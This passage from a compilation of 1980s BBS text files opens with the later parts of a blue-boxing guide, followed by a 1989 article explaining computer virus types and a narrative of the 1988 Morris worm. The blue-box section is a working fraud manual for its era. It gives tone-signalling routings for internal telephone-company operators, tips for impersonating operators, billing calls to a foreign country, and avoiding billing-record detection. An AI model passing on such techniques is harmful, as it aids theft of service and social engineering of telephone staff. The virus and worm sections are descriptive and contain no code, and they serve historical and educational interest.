someone picked up the fone at the CALLED end and you should begin to be billed.
So you do start to get billed, but for the call to the trunk, NOT the boxed
call. Your billing equipment thinks that you've connected with the number you
used to seize the trunk.
Illustration:
1. You call 1+806-258-2222 (directly)
2. Status of trunks:
<----------------------------------->
(You) 806-258-2222
No 2600Hz-------> <------------2600Hz
When you seize a trunk (before the number you called answers) there is no
affect on your billing equipment. It simply thinks that you're still waiting for
the call to complete (the CALLED end is still on-hook; it is ringing, busy,
going to recorder or intercept operator.
Now, let's say that you've sezied a trunk (806-258-2222) and for example,
KP+314+949+1705+ST. The call is routed from the tandem you seized to:
314-949-1705.
Illustration:
<------------------>O<--------------->
(You) 806 314-949
tandem
No 2600Hz----------> <----------2600Hz
Note that the entire path towards the right (the CALLED end) has no 2600Hz
present and is therefore "off- hook." The entire path towards the left (the
CALLING end) does have 2600Hz present on it, indicating that the CALLED end has
not picked up (or come "off-hook"). When 314-949-1705 answers, "answer
supervision" is given and the 2600Hz towards the left (the CALLING end)
terminates. This tells your billing equipment, which thinks that you're still
waiting to be connected with 806-258-2222, that you've finally connected.
Billing then begins to 806-258-2222. Not exactly an auspicious beginning for an
aspiring young phone phreak.
To avoid this, several actions may be taken. As previously mentioned, one may
avoid being charged for the number called to seize a trunk by using an extender
(in which case the extender will get billed). In some areas, boxing may be
accomplished using an 800 number, generally in the format of 800-858-xxxx (many
Amarillo numbers) or 800-NN2-xxxx (special intra-state class in-WATS numbers).
However, boxing off of 800 numbers is impossible in many areas. In my area,
Denver, I am served by #1A ESS and it is impossible for me to box off of any 800
number.
Years ago, in the early days of blue boxing (before my time), phreaks often
used directory assistance to box off of because they were "free" long distance
calls. However, because of competetive long distance companies, directory
assistance surcharges are now $0.50 in many areas. It is additionally advised
that directory assistance numbers not be used to box from because of the
following:
Average DA calls last under 2 minutes. When you box a call, chances are that
it will last considerably longer. Thus, the Bell billing equip- ment will make a
note of calls to directory assistance that last a long time. A call to a
directory assistant lasting for 4 hours and 17 minutes may appear somewhat
suspicious.
Although the date, time, and length of a DA call do not appear on the bill, it
is recorded on AMA tape and will trip a trouble report if it were to last too
long. This is how most phreaks were discovered in the old days. Also, sometimes
too many calls lasting too long to one 800 number may raise a few eyebrows at
the local security office.
Assuming you can complete a blue box call, the following are listed routings
for various Bell internal operators. These are in the format of KP+NPA+ special
routing+1X1+ST, which I will explain later. The 1X1 is the actual operator
routing, and NPA and NPA+ special routing are used for out-of- area code calls
and out-of-area code calls requiring special routing, respectively.
KP+101+ST ...... toll test board
KP+121+ST ...... inward op
KP+131+ST ...... directory assistance
KP+141+ST ...... was rate & route. Now only works in 312, 815, 717, and a few
others. It has been replaced with a universal rate & route number,
800+141+1212.
KP+151+ST ...... overseas completion operator (inbound). Works only in certain
NPAs, such as 303.
KP+181+ST ...... in some areas, toll station for small towns
Thus, if you seize a trunk in 806 NPA and wanted an inward (in 806), then you
would dial KP+121+ST. If you wanted a 312 inward and were dialing on an 806
trunk, an area code would be required. Thus, you would dial KP+312+121+ST.
Finally, some places in the network require special routing, in addition to an
area code. An example is Franklin Park, Ill. It requires a special routing of
032. For this, you would dial KP+312+032+121+ST for a Franklin Park inward
operator.
Special routings are in the format of 0XX. They are used primarily for load
balance, so that traffic flow may be evenly distributed. About half of the
exchanges in the network require special routing. Note that special routings are
NEVER EVER EVER used to dial normal telephone numbers, only operators.
Operator functions:
TOLL TEST BOARD- Generally a cordboard position that assists in trunk testing.
They are not used by operators, only switchmen.
INWARD- Assists the normal TSPS (0+) operator in completing calls out of the
TSPS's area. Also, inwards perform emergency inerrupts when the number to be
interrupted is out of the area code of the original (TSPS) operator. For
example, a 303 operator has a customer that needs an emergency interrupt on
215-647-6969. The 303 operator gets the routing for the inward that covers
215-647, since she cannot do the interrupt herself.
The routing is found to be only 215+ (no special routing required). So, the 303
operator keys KP+215+121+ST. An inward answers and the 303 says to her, "Inward,
this is Denver. I need an emergency interrupt on 215-647-6969. My customer's
name is Mark Tabas." The inward will then do the interrupt (off the line, of
course). If the number to be interrupted had required special routing, such as,
say, 312-456-1234 (spec routing 032), then the 303 operator would dial
KP+312+032+121+ST for the inward to do that interrupt.
DIRECTORY ASSISTANCE- These are the normal NPA+555+1212 operators that assist
customers with obtaining telefone directory listings. Not much toll-fraud
potential here, except maybe $0.50.
RATE AND ROUTE- These operators are reached by dialing KP+800+141+1212+ST.
They assist normal (TSPS) operators with rates and routings (thus the name). The
only uses I typically have for them are the following:
1. Routing information. In the above example, when the 303 operator needed to
dial an inward that served 215-647, she needed to know if any special routing
was required and, if so, what it was. Assuming she would use rate and route, she
would dial them and say nicely, "Operator's route, please, for 215-647." Rate &
route would respond with "215 plus." This means that the operator would dial
KP+215+121+ST to reach the inward that serves 215-647. If there were special
routing required, such as in 312-456, rate & route would respond with "312 plus
032 plus." In that case, the operator would dial KP+312+032+ST for the inward
that serves 312-456.
It is good practice to ask for "operator's route" specifically, as there are
also "numbers route" and "directory routes." If you do not specifically ask for
operator's route, rate & route will generally assume that is what you want
anyway.
"Numbers" route refers to overseas calls. Example, you want to know how to
reach a number in Geneva, Switzerland (and you already have the number). You
would call routing and say "Numbers route, please, Geneva, Switzerland." The
operator would respond with: "Mark 41+22. 011+041+ST (plus) 041+22" The "Mark
41+22" has to do with billing, so disregard it. The 011+041 is access to the
overseas gateway (to be discussed in Part iii) and the 041+ 22+ is the routing
for Geneva from the overseas sender. "Directory" routings are for directory
assistance overseas. Example: you want a DA in Rome, Italy. You would call rate
& route and say, "Directory routing please, for Rome, Italy." They would respond
with "011+039+ST (plus) 039+1108 STart." As in the previous example, the 011+039
is access to the overseas gateway. The 039+1108 is a directory assistant in
Rome.
2. Nameplace information. Rate & Route will give you the location of an NPA+
exchange. Example: "Nameplace please, for 215-648." The operator would respond
with "Paoli, Pennsylvania." This isn't especially useful, since you can get the
same information (legally) by dialing 0, but using rate & route is often much
faster and it avoids having to hang up when you are already on a trunk.
*NOTE on Rate & Route: As a blue boxer, always ask for "IOTC" routings. (e.g.,
"IOTC operator's route", "IOTC numbers route", etc.) This tells them that you
want cordboard-type routings, not TSPS, because a blue boxer is actually just a
cordboard position (that Bell doesn't know about).
OVERSEAS COMPLETION OPERATOR (inbound)- These operators (KP+151+ST) assist in
the completion of calls coming in to the United States from overseas. There
are KP+151+ST operators only in a few NPAs in the country (namely 303). To use
one, you would seize a trunk and dial KP+303+151+ST. Then you would tell the
operator, for example, "This is Bangladesh calling. I need U.S. number
215-561-0562 please." [in a broken Indian accent]. She would connect you, and
the bill would be sent to Bangladesh (where I've been billing my KP+151+ST calls
for two years).
Other internal Bell Operators.
KP+11501+ST ...... universal operator
KP+11511+ST ...... conference op
KP+11521+ST ...... mobile op
KP+11531+ST ...... marine op
KP+11541+ST ...... long distance
terminal
KP+11551+ST ...... time & charges op
KP+11561+ST ...... hotel/motel op
KP+11571+ST ...... overseas (outbound) op
These 115X1 operators are identical in routing to the 1X1 operators listed
previously, with one exception. If special routing is required (0XX), then the
trailing 1 is left off.
Examples:
A 312 universal op ... KP+312+11501+ST
A Franklin Park (312-456) universal op (special routing 032 required)....
................... KP+312+032+1150+ST
[The trailing 1 of 11501 is left off].
rposes of 115X1 operators.
UNIVERSAL- Used for collect/callback calls to coin stations.
CONFERENCE- This is a cordboard conference operator who will set up a conference
for a customer on a manual operation basis.
MOBILE- Assists in completion of calls to mobile (IMTS) type telefones
MARINE- Assists in completion of calls to ocean going vessels.
LONG DISTANCE TERMINAL- Now obsolete. Was used for completion of long distance
calls.
TIME & CHARGES- Will give exact costs of calls. Used to time calls and inform
customer of exactly how much it cost.
HOTEL/MOTEL- Handles calls to/from hotels and motels.
OVERSEAS COMPLETION (outbound)- assists in completion of calls to overseas
points. Only works in some, if any NPAs, because overseas assistance has been
centraized to IOCC (covered in Part iii).
Note that all KP+1X1+ST and KP+115X1+ST operators automatically assume that
you are a TSPS or cordboard operator assisting a customer with a call. DO NOT DO
ANYTHING TO JEOPARDIZE THIS! If you do not know what to do, don't call these
operators! Find out what to do first.
This concludes Part II. There is one final part in which I will explain
overseas dialing, IOCC (International Overseas Completion Centre), RQS
(Rate/Quote System), and some basic scanning.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Better Homes and Blue Boxing
Part iii
Advanced Signalling
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
(It is assumed that the reader has read and understood parts i & ii before
proceeding to this part).
In parts i & ii, I covered basic theory and domestic singalling and operators.
In this part I will explain overseas direct boxing, the IOCC, the RQS, and some
basic scanning methods.
Overseas Direct Boxing.
Calling outside of the United States and Canada is accomplished by using an
"overseas gateway." There are 7 overseas gateways in the Bell System, and each
one is designated to serve a certain region of the world. To initiate an
overseas call, one must first access the gateway that the call is to be sent on.
To do this automatically, decide which country you are calling and find its
country code. Then, pad it to the left with zeros as required so it is three
digits. [Add 1, 2, or 3 zeros as required].
Examples:
Luxembourg (352) is 352 (stays the same)
Spain (34) becomes 034 (1 zero added)
U.S.S.R. (7) becomes 007 (2 zeros added)
Next, seize a trunk and dial KP+011+ CC+ST. Note that CC is the three digit
padded country code that you just determined by the above method. [For
Luxembourg, dial KP+011+352+ST, Spain KP+011+034+ST, and the U.S.S.R. KP+011+
007+ST]. This is done to route you to the appropriate overseas gateway that
handles the country you are dialing. Even though every gateway will allow you to
dial every dialable country, it is good practice to use the gateway that is
designated for the country you are calling.
After dialing KP+011+CC+ST (as CC is defined above) you should be connected to
an overseas gateway. It will acknowledge by sending a wink (which is audible as
a <beep><kerchink> and a dial tone. Once you receive internat- ional dial tone,
you may route your call one of two ways: a) as an operator-originated call, or
b) as a customer-originated call. To go as a operator-originated call, key KP+
country code (NOT padded with zeros)+ city code+number+ST. You will then be
connected, providing the country you are calling can receive direct-dialed
calls. The U.S.S.R. is an example of a country that cannot.
Example of a boxed int'l call:
To make a call to the Pope (Rome, Italy), first obtain the country code, which
is 39. Pad it with zeros so that it is 039. Seize a trunk and dial
KP+011+039+ST. Wait for sender dial tone and then dial KP+39+6+6982+ST. 39 is
the country code, 6 is the city code, and 6982 is the Pope's number in Rome. To
go as an operator-originated call, simply place a zero in front of the country
code when dialing on the gateway. Thus, KP+0+39+6+6982+ST would be dialed at
sender dial tone. Routing your call as operator-originated does not affect much
unless you are dialing an operator in a foreign country
To dial an operator in a foreign country, you must first obtain the operator
routing from rate & route for that country. Dial rate & route and if you're
trying to get an operator in Yugoslavia, say nicely, "IOTC Operator's route,
please, for Yugoslavia." [In larger countries it may be necessary to specify a
city]. Rate & route will respond with, "38 plus 11029". So, dial your over- seas
gateway, KP+011+038+ST, wait for sender dial tone, and key KP+0+38+ 11029+ST.
You should then get an operator in Yugoslavia. Note that you must prefix the
country code on the sender with a 0 because presumably only an operator here can
dial an operator in a foreign country.
When you dial KP+011+CC+ST for an overseas gateway, it is translated to a
3-digit sender code of the format 18X, depending on which sender is designated
to handle the country you are dialing. The overseas gateways and their 3-digit
codes are listed below.
182 ..... White Plains, NY
183 ..... New York, NY
184 ..... Pittsburg, PA
185 ..... Orlando, FL
186 ..... Oakland, CA
187 ..... Denver, CO
188 ..... New York, NY
Dialing KP+182+ST would get you the sender in White Plains, and KP+183+ST
would get the sender in NYC, etc., but the KP+011+CC+ST is highly suggested (as
previously mentioned). To find out what sender you were routed to after dialing
KP+011+CC+ST, dial (at int'l dial tone): KP+0000000+ST.
If you have difficulty in reaching a sender, call rate and route and ask for a
numbers route for the country you're dialing. Sometimes, KP+011+ padded country
code+ST will not work. I have found this in many 3-digit country codes.
Lexembourg, country code 352, for example, should be KP+011+352+ST
theoretically. But it is not. In this case, dial KP+011+ 003+ST for the overseas
gateway. If you have trouble, try dialing KP+00+ first digit of country code+ST,
or call rate The IOCC.
Sometimes when you call rate and route and ask for an "IOTC numbers route" or
"IOTC operators route" for a foreign country, you will get something like
"160+700" (as in the case of the Soviet Union). This means that the country is
not dialable directly and must be handled through the International Overseas
Completion Centre (IOCC). For an IOCC routing, pad the country code to the RIGHT
with zeros until it is 3 digits. Then KP+160 is dialed, plus the padded country
code, plus ST.
Examples:
The U.S.S.R. (7) ...... KP+160+700+ST
Japan (81) ............ KP+160+810+ST
Uraguay (598) ......... KP+160+598+ST
You will then be routed to the IOCC in Pittsburg, PA, who will ask for
country, city, and number being dialed. Many times they will ask for a ringback
[thanks to Telenet Bob] so have a loop ready. They will then place the call and
call you back (or sometimes put you through directly). Some calls, such as to
Moscow, take several hours.
The Rate Quote System (RQS).
The RQS is the operator's rate/quote system. It is a computer used by TSPS
(0+) operators to get rate and route information without having to dial the rate
and route operator. In Part ii, I discussed getting an inward routing for
dialing-assistance and emergency interrupts from the rate and route operators
(KP+800+141+1212+ST). The same information is available from RQS. Say you want
the inward routing for 305-994. You would sieze a trunk and dial KP+009+ST (to
access the RQS). Sometimes, if you seize a trunk in an NPA not equipped with
RQS, you need to dial an NPA that is equipped with RQS first, such as 303.
Anyway, after you dial KP+009+ST or KP+303+009+ST, you will receive a wink
(<beep><kerchink>) and then RQS dial tone. At RQS dial tone, for an inward
routing for 305-994 you would dial KP+06+305+994+ST. That is,
KP+06+NPA+exchange+ST. RQS will respond with "305 plus 033 plus". This means you
would dial KP+305+033+121+ST for an inward that services 305-994. If no special
routing were required, RQS would have responded with "305 plus" and you would
simply dial: KP+305+121+ST for an inward.
Another RQS feature is the echo feature. You can use it to test your blue box.
Dial RQS (KP+009+ST) and then key KP+07+1234567890+ST. RQS will respond with
voice identification of the digits it recognized, between the KP+07 and ST.
RQS can also be used for rates and directory routings, but those are seldom
needed, so they have been omitted here.
Simple Scanning.
If you're interested in scanning, try dialing on a trunk, routings in the
format of KP+11XX1+ST. Begin with 11001 and scan to 11991. There are lots of
interesting things to be found there, as Doctor Who (413 area) can tell you.
Those 11XX1 routings can also be prefixed with an NPA, so if you want to scan
area code 212, dial KP+212+ 11XX1+ST.
There, now you know as much about blue boxing as most phreaks. If you read and
understand the material, and put aside preconceived ideas of what blue boxing is
that you may have aquired from inexperienced people or other bulletin boards,
you should be well on you way to an enlightening career in blue boxing. If you
follow the guidelines in Part i to box, you should have no problem with the fone
company. Comments made by "phreaks" on bulletin boards that proclaim "tracing"
of blue boxers are nonsense and should be ignored (except for a passing
chuckle).
NOTE 1: CCIS and the downfall of blue
boxing.
CCIS stands for Common Channel Inter- office Signalling. It is a signalling
method used between electronic switching systems that eminiates the use of
2600Hz and 3700Hz supervisory signals, and MF pulsing. This is why many places
cannot be boxed off of; they employ CCIS, or out-of-band signalling, which will
not respond to any tones that you generate on the line. Eventually, all existing
toll equipment will be upgraded or replaced with CCIS or T-carrier. In this
case, we'll all be boxing with microwave dishes. Until then (about 1995 by
current BOC/AT&T estimates), have fun!
If you have ANY questions about this text, please feel free to drop me a line. I
will respond to all mail, messages, etc. Insults are also welcomed. And if you
discover anything interesting scanning, be sure to let me know.
Mark Tabas
$LOD$
This text was prepared in full by Mark Tabas for:
K.A.O.S.
Philadelphia, PA.
[215-465-3593].
Any sysop may freely download this text and use it on his/her BBS, provided that
none of it be altered in any way.
Technical acknowledgements:
Karl Marx, X-Man, High-Rise Joe, Telenet Bob, Lex Luthor, TUC, John Doe, Doctor
Who (413 area), The Tone Sweep, Mr. Silicon, K00L KAT, The Glump.
References:
1. Notes on the BOC Intra-LATA Networks Bell System publication, 1983.
2. Notes on the Network Bell System publication, 1983.
3. Engineering and Operations in the Bell System Bell System publication, 1983.
4. Notes on Distance Dialing Bell System publication, 1968.
5. Early Medieval Architecture.
.......................................
(c) February 6, 1900 Mark Tabas
.......................................
Call 1-305-994-9966
....................
(c) February 6, 1900 Mark Tabas
.......................................
VI
--
This is a text file I wrote for online magazine in 1989.
Viruses.....The Computer Epidemic
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
In the early 80's, if you told a computer user of any sort that his
her system could become infected with a virus, you would have probably been
greeted with an out roar of laughter. Today, of course, this is not the case.
Now when the words 'computer' and 'virus' are mentioned in the same sentence,
computer users ears stand at attention. Viruses have become a serious threat,
needless to say. The media doesn't help out the situation by blowing it up.
Odds are that you will never have to come to grips with a computer
virus, but there is always that possiblity. So this text was written to
hopefully shed some light on the subject.
First off, I often hear people blaming software and hardware problems on
viruses, trojan horses, worms, logical bombs, etc. Usually it isn't a virus
that is to blame. I hear comments like,'My hard drive crashed because a virus
wrote over my FAT tracks', or what not. In the first place, hard drives do give
out. It just happens. Second off, if there was a program that killed the hard
drive, it wasn't a virus. It was more than likely a trojan horse. So, here in
the text I would like to give a few definitions or programs that threat your
system............
Worm Program - This is a program the reproduces itself by creating copies
itself, but the actual code contains no instructions to
replicate. That is, it does not infect other programs. The
major difference between this and a virus is that a worm
needs no host program to reproduce. Worms 'creep' through
all levels of a computer without the need of a host program.
This type of program is just as serious as any virus if not
discovered in time. This type of program is which you often
hear about involving banks. For example, a bank computer
continue transfering money to an illicit account after being
instructed to do so by the worm program, which then
disappears. Once this type of program is discovered it is
easy to get rid of, because it doesn't have the ability to
reproduce (or infect other programs)
Trojan Horse - This is often confused with viruses and worms. The objective
of this program is much the same as the greek story. That is
that it is a destructive program disguised as an innocent
one. Trojan horses are not viruses because they do not
reproduce themselves as viruses do. These programs tend
to have a very destructive manner. They hide themselves
in an program inviting to the user. While he is mesmerized
at the program, it reformats his hard drive. This program
can also be used to break into computer systems.For example,
If a trojan horse is written on a low-level account, then
when it is executed by a high level user, such as a sysop,
the program up's the lower access level while the higher
user is mezmerized by the niffty game or graphics or what
not.
Logic Virus - This is arguably a virus. These programs do not modify there
host programs, they just simply delete them and take the
place of the host program. For example, if A is a virus and
B is a user program, then renaming A to B makes B appear as
a virus.
Logic Bombs - Very similar to a Trojan horse in its programing and ability
to destroy data, but has a built-in timing device that sets
it off. These programs also lack the ability to reproduce.
For example, a employ hears that he is about to be laid
off from the company he works at, he might install a logic
bomb to go off one week at 3 p.m after the day he is laid
off.
The major difference between viruses and trojan horses, logic bombs and
worms is there ability to reproduce. For a program to be considered a true
virus, it must have the following properties.........
1. To be able to modify software not belonging to the virus program.
2. To be able to execute the modifications on a number of programs.
3. To be able to recognize a modified program that is already infected.
4. To be able to prevent further modifications to the same program
upon reconition.
5. Modify software assuming attribute 1 to 4.
Without one or more of these following properties, the program cannot
be considered a true virus (except for the logical virus, and even this
even argued at times). Now that thats been covered we can discuss the
different types of viruses and how they work. First off there are basicly two
types of viruses from a programing stand point. They are the overwritting and
non-overwriting types. Overwriting are the simplest types of viruses. Over-
writing viruses symptoms usually show up quickly as soon as the virus becomes
acute. An overwritting virus destroys part of its host program code to imbed
itself. Here is a graphic representation of a overwriting virus.......
VIR - Virus Kernal
MAN - Manipulation task of the virus. This is what the virus is suppost
to do when 'awake' in the system.
M - Marker Byte. This is so that the virus will know exactly what has been
infected and what hasn't. This keeps the virus from reinfecting the
same user programs.
For the purpose of infiltrating the system,a program is deliberately
infected with the virus. (This intentional infection is necessary to prevent
an error message from occuring when the carrier program is started.)
So here is our what our host program looks like......
M:VIR:MAN (Carrier program)
When this program is started first. The marker byte M in this case is
represented as a jump command charateristic of this virus (sometimes called
'null operation'). The virus kernal becomes active and is ready to do its
destructive work. The virus now looks through mass storage to an executable
program. It finds one and fetchs a small portion of that program into memory.
It does this to see if a marker is present. If there is , that file has already
been infected and will move on to the next use file. in this case lets say
that there is not a marker present. So it looks like thus.......
: : (Second user program)
Now ,since it is an un-infected program, the program is overwritten,
meaning that the virus destroys the program code for its own code. It now looks
like thus........
M:VIR:MAN (Second user program)
After the actual infection process is done, the manipulation task is
executed. After the manipulation task is complete , execution returns to the
carrier program and the user if fooled into thinking that the the program is
running correctly. Now when the 2nd user program is started it goes on
described as above.....So the 2nd user program is started.....
M:VIR:MAN (Second user program)
The 3rd user program is found with no marker present.....
: : (Third user program)
It gets infected like described above.....
M:VIR:MAN (Third user program)
Mysterious error messages will now start to occur, but by then the
program has accomplished its goal, namely the execution of the manpulation
program. I should also mention that the marker from virus to virus
is different. Now it is true that a overwriting virus can survive without a
host program, but it would be detected very easily. Overwritting viruses
are usually hard to trace back to there host program.
Non-overwritting viruses are usually the most dangerous. This type of
virus can be present in a users system for years without him knowing it. Non-
overwritting are similar to overwritting, except an additional MOV routine is
added.
VIR - Virus kernal
MAN - Manipulation task
MOV - Move routine for the program regenerator
M - Marker Byte
Here also a infected carrier program is used, but this one has no error!
As with the overwritting virus there is a jump or null command at the start
which represents the virus marker. If the virus is active it looks for
executable programs just like the overwritting virus......
M:VIR:MAN:MOV (User program)
The virus finds the 2nd user program, and in this case we will say that
no marker is found. So it is uninfected......
: : : (Second user program)
Now here is were is differs from the overwritting. First, a part of the
program is selected which is the exact same length as the virus without the
MOV routine.
Part 1 : (Second user program)
The selected first part is now copied to the end of the user program.
The length of the user program does grow. Now it should be said that the
manipulation takes place on mass storage and not in memory.
Part 1 : (Second user program) : Part 1 : MOV
This has so far worked much like the overwritting, in that the
copy porcedure is the same. This means that the first part of the 2nd user
program is overwritten by the virus program,so the MOV routine is not included
since it is already at the end of the program. At the conclusion of this and
the munipulation, the 2nd user program looks like this......
M:VIR:MAN: (Second user program) : Part 1 : MOV
Part of the program has been overwritten because the virus code in this
example program must be at the start of the program in order to make sure it is
executed when the program is started. But the first part of the program has
not been lost since it has been saved at the end or the program.
Now the virus in the carrier program performs the desired manipulation and
is execution continues with the carrier program itself. You basicly have the
same situation as the first virus described, in that the virus does not
replicate itself at first and does not exhibit any other activities. This
condition remains the same till the 2nd user program is started. In the case
the infection is transfered to the next uninfected file, or in this case we'll
say the 3rd user program.....
: : : (Third user program)
After the 2nd user program...
M:VIR:MAN: (Third user program) : Part 1 : MOV
After the actual infection process and after the manipulation task has
been executed, the MOV routine is activated. The entire infected 2nd user
program is found in memory. From this the MOV routine selects the orginal
start of the program that had been copied and moves it back.....like thus....
Before MOV....
M:VIR:MAN: (Second user program) : Part 1 : MOV
After activation of MOV.....
Part 1 : (Second user program) : Part 1 : MOV
The original version is now in memory. The MOV routine preforms a jump
to start of the program, where the program runs without error. The additions
part and MOV are no longer needed and can be written over without error.....
These two ways are the only two ways know at this time that I know first
hand or read about for a virus to operate. So basicly , you can only have an
overwritting or a non-overwritting virus.
What exactly to watch out for......
===================================
For the most part, if you, yourself, are going to catch a virus, you need
know what to look for.You should probably check every now and then to make sure
that any files aren't suddenly increasing is size. It might also be wise to
set up empty files (on the IBM, empty, 'com','exe', etc files) so you
can go back every now and then to see if anything has attached to them.
If your computer system saves a 'date-time stamp', it might be wise to check
those every once and a while. It might be a good idea for you to set your
attributes for read only on important programs (but this can easily be gotten
around by some viruses. I know for a fact that Apple computers, on a write
protected disk, can still be written on. Basicly there is no way to have a
completely virus proof system. Even vaccination programs might not work on all
viruses. These programs , though they are good to have, tend to look for
virus traits in programs or they just check your 'time and date stamps', file
sizes for you. These are usually effective programs but even they can fail.
For example, what if you have a vaccine program that looks for certain
virus traits but some niffty virus comes around using a different method? It
could miss. I do think they are great to have around though, for those 'just
in case times'. Now you might think 'why not just have a vaccine program that
looks for the marker'. The problem there is that markers are different from
virus to virus....But at any rate, here are the names and addresses for a few
vaccine programs......
Disk Defender
(For IBM PC's and compatables)
Director Technologies
906 University Place
Evanston, IL 60201
(312)491-2334
Price: $240 (Exellent)
PC Safe
(For IBM PC's and compatables)
The Voice Connection
17835 Skypark Circle
Irvine, CA 92714
(714)261-2366
Price: $45
Tracer
(For IBM PC's and compatables)
Interpath Corporation
4423 Cheeney Street
Santa Clara, CA 95054
(408)727-455
I hope in some way or another. I know it gets confusing in parts, but usually
reading it two or three times and you will get the over all picture. If you
would like to know more about virus, like there source code, or have any
questions, or you just feel like insulting me, please do. Drop me E-mail at...
'The Hurrican Hole'
(XXX)XXX-XXXX
To....
The Beaver (Member of SC/HA)
(December 22, 1989)
VII
---
This is another artical I wrote for online magazine in 1989. Its just
a bunch-o-storys and interviews. Not any technical info.
Once upon a time,a disgrutled mainframe programmer was fired by the
administrator overlords and summarily removed from the computers sanctum. All
was well for six months, six days, and six hours. Suddenly, all the keyboards
on the mainframe's terminals mysteriously ceased to function as the
programmer's personally planted time bomb proceeded to lobotomize the system.
The administrator watched in horror as the tape drivers locked up and all
mounted tapes were erased, bit by bit. There was absolutely nothing they could
do as the card reader/punch proceeded to randomly punch holes in all the
program decks that were mounted at that time. Finnally, the disk and drum
storage devices went through a complete erasing process, sending all their
data to the Data Bardo. Meanwhile, the time bomb dutifully displayed its
moment-by-moment blows on the main console monitor. Fortunately, the great
sanctum had recently made a backup of all its data. At great expense to the
administrarors, the sanctum programmers spent weeks restoring and generally
recreating all lost files. A special team of crack programmers were hired to
comb the operating system's source code carefully in search of the time bomb.
Finnally, they found it and, with the skill of practiced surgeons, removed all
traces of the software cancer. Once rebooted, the sanctum's system behaved
beautifully, without a hitch.........
.........Thats is, until six months, six days, six hours later, when the whole
process repeated itself........
( This is no fairy tale. This story is based on an actual incident that
occured in the later 1960's, a time before personal computers, when giant
dinosaurlike mainframes roamed the planted.)
-Story as told by Allan Lundell-
Author of 'Virus!'
Internet Virus .............
========================================================================
On November 2,1988, the Internet virus made its debut on planet earth.
In less than 12 hours it had infected over six thousand computers scattered
nationwide. All though this creature never reached its full potential,
because it fell ill to a program bug, it was still one of the worst incidents
in which a virus was the cause.
The time was 9 p.m at MIT in artifical intelligence laboratory. Acting
on a remote signal from Ithaca, New York, the internet virus was launched
from its hard disk 'holding pen' into a telephone line, heading for
internet. Its goal was widespread exploration and infection of the network
without detection. It easily made its way past the entry test of the internet
boundary guards, showing them a electronic 'internet technical' pass which
allows a user to work on the send mail electronic system, which is high
priority access. If this entry had not have worked, it would have sent
the electronic guards thousands of possible password ID's with a good
probability that one would have worked. Once in, the virus started to
replicate everywhere, sending copies of itself in every direction of the
the network. It rapidly filled up all the empty spaces on internet.
At about 10 p.m. that night, Pascal Chesnais, a computer
researcher working late a MIT noticed that all programs were slowing down
to a crawl. Two or three of his friend also noticed the bizarre behavior.
At first, they figured it was a legitimate program that had gone out of
control because of an internal error. 'We thought it was just a run away
program', he recalls. 'So we killed all processes and the problem seemed
to go away'. Unconcerned, they went out for ice cream.
Meanwhile, at the University of California, the virus penitrated
its way there. There newly installed security software was detecting
strange behavior on the network communications lines. 'Our security system
alerted use that strange commands were come in form online', recalls
Peter Yee, a scientist at the university. This early warning allowed
them to contain the virus fast than any other node on internet. They
not only got it to stop replicating but by shutting down there communication
links but they also traped it to analyzed.
Meanwhile , researchers at Bellcore, in Livingston New Jersey,
joint research lab for the regional Bell holding companys discovered the
virus at 10:30 p.m. they two were able to contain the virus by shutting
down there computers fast.........
At 10:34 p.m. the invader struck Princeton University, and was
discovered by Victor Dukhovni, a twenty five year old system programmer.
He also noticed that the system was moving slow. Working alone he idenified
the probe in the mailing system, reproducing at a rapid rate.
By now it had spread to NASA Ames Research, at 12 a.m they too
cut off communication lines. At about this time, Pascal and friend returned
from there ice-cream break it find that the system was once again performing
strangly.
Meanwhile Robert T. Morris, Jr., a twenty three year old Cornell
university graduate student telephoned a friend at Harvard's Aiken Lab
and asked him to send out an alert over the network on how to stop the
virus. Unfortunately, it was sent to a obscure BBS never to be seen
by any researchers.
At 12:31 a.m. the virus struck John Hopkins University and at 1:15
a.m it hit the University of Ann Arbor. By 2:30 a.m., Pascal indentified
that the virus was coming though the mail system, and stated that they must
disconnect the computer from the network. At 3 a.m., Pascal want to bed
knowing the serious state that the networks was in. Although the
not all the systems one the network were not infected by the virus, but
it wasn't a lack of trying. So systems recorded that there had been some
2000 attempts to login.
Intresting enough was the fact that AT&T Bell Laboratories in
Muray Hill, New Jersey, where the young Robert Morris, Jr., had worked
for a time, escaped infection. About a year prior to the attack, Bell
Labs had patched its software to eliminate the loophole in the electronic
mail software. When Bell had tried to warn other groups of UNIX users of
the potential security breach, Bell found that few shared 'our rather
paranoid view of communications software'.
Classified defense computers were not affected by the attack,
even though ARPAnet (with in internet) is used for unclassified, defense
related work. Fortunately, U.S. defense computers employ greater security
precautions than unclassified systems, making the classified computers harder
to penitrate. The virus only seemed to penetrate UNIX runned SUNs and
VAXes, and by about 4 a.m. researchers figured out how the virus worked
and had created a immunity and posted it on the internetwork, but with
the virus being on the network, most systems had been taken down and few
would read the message in time. Communications among researchers became
limited by the fact that they mostly often would deal with electronic mail,
and not by voice communications. With this in mind, it became harder to
contact researchers with them taking down they computers to trap the virus.
'The sites without an emergency plan didn't do well', says Russel Brand,
a artifical intelligence doctoral canidate at Berkeley. Soon, as voice
communications became better, they all began to understand the structure
of the virus and its inter makings. By earliy afternoon of Thursday, November
3, 1988 the virus code had been cracked, and slowly all the computers on
the network began to come back on line. Within days, investigators identified
tat Robert Morris Jr., as the probable source of the virus. What was this
creature he had designed?
The internet virus was actualy more of a worm than a virus. This
worm had three ways by which it penetrated through machine security: Send
mail attack, the Fingerd attack, and password cracking. In the send mail
attack, the worm entered through a back door in the send mail utility
that had been left there by the designer. The worm/virus made use of a
little-known command called fingerd. This command ran in the background
and was used to get names, addresses and phone numbers of users. What the
virus did was send data to the buffer to fast causing the buffer of over
load allowing the virus into the host enviorment (this is sometime called
the rapid fire method, by hackers). The third method was by cracking usernames
and passwords with a list it carried with it self of commonly used
passwords and usernames. If this list failed, it would locate the UNIX
dictionary, which is sometimes on the system, and start using words out
of it as passwords. About 5% of the systems infected were through this
method. The bug, that classified it as a full scale virus, was in that it
started to infect the same files over and over instead of identifing it
as already infected. When a file is infected, it grows in length, and when
it re-infects a file it grow yet bigger. The virus/worm started to infect
the same files thousands of times, causing the system to slow down and
become over loaded. After the virus code was cracked, programmers claimed
that it was 'fit for publication in a journal', in that it caused no real
damage to the system. Robert Jr,. originally wanted the virus only to spead
and infect systems and let him know exactly where the virus was, its rate
of infection, it success rate, and how it got pass security. It was nothing
